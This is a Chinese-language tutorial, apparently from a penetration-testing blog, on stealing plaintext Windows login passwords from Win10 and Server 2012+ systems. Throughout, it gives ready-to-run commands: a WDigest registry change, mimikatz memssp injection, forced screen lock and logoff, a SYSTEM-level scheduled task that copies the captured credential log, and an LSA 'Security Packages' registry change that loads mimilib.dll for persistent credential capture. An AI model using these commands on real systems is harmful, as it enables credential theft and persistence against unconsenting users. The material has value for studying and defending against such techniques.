高版本系统密码抓取

一.概述

Win7、 Win2008这样的机器内存中是存储明文的密码，但是在2012之后的机器（win10、win 8、win11、
2012、2016）或者安装了KB2971997补丁是内存中就不在存储明文的密码了，我们无法通过上述的方法
抓取到明文的密码。
以win10为例：

没有抓到

二.修改Wdigest注册表获取系统密码

在Windows2012系统及以上的系统，默认在内存缓存中禁止保存明文密码的。攻击者可以通过
修改注册表的方式抓取明文，需要用户重新登录后才能成功抓取

1.先查询是否存在该值（UseLogonCredential）

还是以win10为例，以管理员身份打开cmd输入

reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /V UseLogonCredential

我们可以按照命令中的路径去注册表看一下

2.添加并修改该值

这里要使用管理员运行命令

  reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

3.mimikatz抓取明文密码

在之前测试中win10是抓不到明文密码的，但经过上面修改注册表的方式，现在内存中就可以存储明文的密码了，但是因为密码在内存中，需要锁屏或者注销用户然
后重新登录后，内存中就保留密码了！

1.锁屏
 rundll32.exe user32.dll,LockWorkStation
2.注销用户
 query user 查询登录ID  logoff ID 

锁屏

注销用户

三.SSP内存注入

1.介绍

Mimikatz中，有写好的恶意的SSP，他可以提供本地认证时候对明文账号密码进行记
录，我们需要将SSP注入到系统内存中，就可以获取本地的明文账号密码，因为是注
入内存所以重启后就失效了(唯一性)，这个攻击也叫（SSP注入）

2.将SSP注入内存中

俩种方法

1. 使用mimikatz：misc::memssp
2.使用mimikatz的PS脚本：
  Import-Module .\InvokeMimikatz.ps1
  Invoke-Mimikatz -Command "misc::memssp"

这里我们使用mimikatz没有抓到win10的密码，输入命令（要在过了UAC情况下）

2.锁屏等待输入密码

锁屏命令

rundll32.exe user32.dll,LockWorkStation

等待管理员输入争取的账号密码后在C:\Windows\System32\mimilsa.log，存放正确的账号密码

3.读取mimilsa.log文件

在CS中直接输入命令读取不到，即使到目录中也查找不到，只有在本机目录下才能查到

但是在实际场景下很难做到运控对方电脑，再进行查找，这时我们可以使用计划任务，将对方文件复制到桌面

先在桌面写一个bat脚本，将mimilsa.log中的内容复制到1.txt中，运行1.bat脚本将会在桌面生成1.txt文件
echo copy C:\Windows\System32\mimilsa.log C:\Users\LEE\Desktop\1.txt > 1.bat

创建计划任务copy
schtasks /create  /tn copy /sc onstart /tr C:\Users\LEE\Desktop\1.bat /ru system /f

运行copy任务
schtasks /run  /i /tn "copy"

读取到明文密码

四.注册表添加SSP获取系统密码

在Mimikatz中有一个mimilib.dll文件，这个就是SSP,将这个文件复制到
C:\Windows\System32目录下

修改注册表，重启后就会加载SSP

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v "Security Packages" /t REG_MULTI_SZ /d mimilib.dll /f

密码将会生成在C:\Windows\System32\kiwissp.log